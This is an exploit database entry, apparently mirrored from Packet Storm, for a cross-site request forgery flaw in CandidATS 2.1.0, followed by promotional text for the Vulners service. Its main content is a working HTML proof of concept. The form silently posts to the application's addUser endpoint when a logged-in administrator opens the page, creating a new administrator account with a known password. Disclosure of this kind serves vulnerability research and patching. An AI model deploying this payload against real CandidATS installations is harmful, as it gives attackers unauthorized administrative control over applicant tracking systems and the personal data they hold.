Lucene search
K

CandidATS 2.1.0 Cross Site Request Forgery

🗓️ 24 Feb 2020 00:00:00Reported by J3rryBl4nksType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 142 Views

CandidATS 2.1.0 CSRF Add Admi

Code
`# Title: CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)  
# Date: 2020-02-21  
# Exploit Author: J3rryBl4nks  
# Vendor Homepage: https://sourceforge.net/u/auieo/profile/  
# Software Link: https://sourceforge.net/projects/candidats/files/#Version 2.1.0  
# Tested on Ubuntu 19/Kali Rolling  
  
# The Candid ATS Web application is vulnerable to CSRF to add a new admin user:  
#CSRF Proof of Concept:  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://HOSTNAME/Candid/index.php?m=settings&a=addUser" method="POST">  
<input type="hidden" name="postback" value="postback" />  
<input type="hidden" name="role" value="none" />  
<input type="hidden" name="firstName" value="Test" />  
<input type="hidden" name="lastName" value="User" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="username" value="Test" />  
<input type="hidden" name="password" value="password" />  
<input type="hidden" name="retypePassword" value="password" />  
<input type="hidden" name="roleid" value="2" />  
<input type="hidden" name="accessLevel" value="500" />  
<input type="hidden" name="submit" value="Add User" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation